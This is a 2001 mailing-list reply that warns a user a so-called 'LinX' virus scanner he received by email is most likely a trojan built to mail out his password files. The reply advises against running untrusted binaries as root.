On Wed, Jan 03, 2001 at 11:39:10AM -0600, John Travis wrote: > I know this is a little OT but this is about the only forum where I > provide the email address that the message in question was received from. > And besides, you gurus should be able to straighten this out :-). I just > got an email (not at this address) warning of a GNU/Linux virus named LinX > that is _supposedly_ going to destroy my shadow password file next month. such a virus would have to be running as root to destroy your shadow file. so you would have had to already have installed a trojan as root. > It contained an executable that was supposed to scour your computer and > determine if you were infected. But upon looking at it in an editor yeah ill bet it did. im sure you must run it as root for it to function correctly right? sounds like a classic trojan to me. > certain things just look bad. It looks like it starts a file with the > contents of ls, then cats your passowrd files on, then tries to initiate a > net connection and sendmail the file to an address at yahoo.com? Now I've > been up for a *long* time, so maybe I'm just being paranoid. I know the > files would be encypted anyway, just curious. So has anyone else heard of > this would be virus? sounds to me like the virus is nothing more then a ruse to try and convince you to run this so called scanner, this scanner then either installs this so called virus itself or does some other evil (mailing your shadow file to someone for example, or adding extra root accounts, tampering with sshd, login, telnetd etc etc). if i haven't made myself clear i believe your `detector' *IS* the trojan. never ever run unknown/untrusted binaries for which you do not have the source. *especially* as root. -- Ethan Benson http://www.alaska.net/~erbenson/
Attachment:
pgpLbyoFQalDF.pgp
Description: PGP signature